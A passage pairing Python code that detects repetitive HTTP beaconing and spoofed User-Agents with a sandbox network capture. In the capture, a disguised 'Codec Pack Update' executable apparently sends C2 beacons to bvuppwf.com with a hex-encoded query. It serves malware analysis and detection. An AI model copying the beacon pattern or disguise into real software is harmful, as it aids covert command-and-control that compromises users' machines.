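Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:02.340536118 CET326OUTGET /search/?q=67e28dd86d55f128 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:03.387979984 CET326OUTGET /search/?q=67e28dd86d55f128 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:03.695990086 CET1286INHTTP/1.1 200 OK
Transfer-Encoding: chunked
Data Raw: 34 39 65 0d 0a 36 37 62 36 39 63 39 35 33 38
"""

# One packet line: timestamp, zone, byte count, direction and payload run together.
PACKET_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) "
                       r"[A-Z]{3,4}(?P<size>\d+)(?P<dir>IN|OUT)(?P<data>.*)$")
KNOWN_NT = {"5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}  # released NT versions


def decode_chunked(raw: bytes) -> tuple[bytes, bool]:
    """Decode an HTTP/1.1 chunked body; returns (body, complete)."""
    body, pos = b"", 0
    while (end := raw.find(b"\r\n", pos)) >= 0:
        try:
            size = int(raw[pos:end].split(b";", 1)[0], 16)
        except ValueError:
            break
        if size == 0:
            return body, True                # last-chunk marker seen: body is whole
        chunk = raw[end + 2:end + 2 + size]
        body += chunk
        if len(chunk) < size:
            break                            # capture ended inside this chunk
        pos = end + 2 + size + 2             # skip the chunk data and its trailing CRLF
    return body, False


def parse_packets(text: str) -> list[dict]:
    """Attach the header and data lines that follow a packet line to that packet."""
    packets: list[dict] = []
    for line in text.splitlines():
        if m := PACKET_RE.match(line):
            line = m["data"]                 # the payload shares the line with the timestamp
            if not (line.startswith("Data Raw: ") and packets):  # else: continuation packet
                head, frac = m["ts"].rsplit(".", 1)  # nanoseconds: keep the first six digits
                ts = datetime.strptime(head, "%b %d, %Y %H:%M:%S").replace(microsecond=int(frac[:6].ljust(6, "0")))
                packets.append({"ts": ts, "size": int(m["size"]), "dir": m["dir"],
                                "first_line": line, "headers": {}, "raw": b""})
        if packets and line.startswith("Data Raw: "):
            packets[-1]["raw"] += bytes.fromhex(line[10:])
        elif packets and not m and ": " in line and not line.startswith("Data Ascii: "):
            name, value = line.split(": ", 1)
            packets[-1]["headers"][name] = value
    return packets


def user_agent_findings(ua: str) -> list[str]:  # author's heuristics, not a standard check
    findings = []
    if (m := re.search(r"Windows NT (\d+\.\d+)", ua)) and m[1] not in KNOWN_NT:
        findings.append(f"Windows NT {m[1]} was never released")
    if "MSIE" in ua and "compatible;" not in ua:
        findings.append("MSIE without the 'compatible;' token real IE sends")
    return findings


def analyse(text: str, min_hits: int = 3) -> dict:
    """Repeated identical requests (beacons) plus the decoded chunked reply bodies."""
    packets = parse_packets(text)
    by_target: dict[tuple, list[dict]] = defaultdict(list)
    for p in packets:
        if p["dir"] == "OUT":
            by_target[(p["headers"].get("Host", ""), p["first_line"])].append(p)
    beacons = []
    for (host, request), reqs in by_target.items():
        if len(reqs) >= min_hits:
            gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(reqs, reqs[1:])]
            beacons.append({"host": host, "request": request, "count": len(reqs),
                            "mean_gap_s": round(sum(gaps) / len(gaps), 3),
                            "ua_findings": sorted({f for r in reqs for f in user_agent_findings(r["headers"].get("User-Agent", ""))})})
    bodies = []
    for p in packets:
        if p["dir"] == "IN" and p["headers"].get("Transfer-Encoding") == "chunked":
            body, complete = decode_chunked(p["raw"])
            bodies.append({"bytes": p["size"], "body": body, "complete": complete})
    return {"beacons": beacons, "bodies": bodies}
```

Call analyse(SAMPLE_LOG) (Python 3.9 or newer for the built-in generic annotations). On the constructed sample it reports one beacon: three identical requests to bvuppwf.com about 0.73 s apart that trigger both User-Agent findings, plus one complete 14-byte reply body and one body cut off mid-chunk. Grouping on the Host header and the full request line is deliberate: a legitimate client does not send the byte-identical query string every half second, so the count and the cadence are the signal even before the q blob is understood.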


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49748 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:04.233731985 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:04.543636084 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:04.653286934 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:04.952740908 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:05.059288979 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:05.364540100 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49749 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:05.701803923 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:05.999649048 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:06.106339931 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:06.412883043 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49750 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:06.748155117 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:07.046247959 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:07.153408051 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:07.458676100 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49751 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:07.805202961 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:08.101895094 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49752 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:08.435174942 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:08.741849899 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49753 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:09.075777054 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:09.380022049 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49754 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:09.713854074 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:10.009288073 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:10.122006893 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:10.425319910 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49755 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:10.764656067 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:11.064590931 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49756 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:11.403064966 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:11.705988884 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49757 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:12.050126076 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:12.361087084 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49758 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:12.708509922 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:13.009927988 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:13.121896029 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:13.428590059 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49759 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:13.760736942 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:14.055845976 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:14.168811083 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:14.470607996 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49760 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:14.816267967 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:15.117500067 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49761 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:15.452589989 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:15.754421949 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49762 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:16.093878984 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:16.402996063 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:16.512774944 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:16.811521053 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:16.918884993 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:17.222748041 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
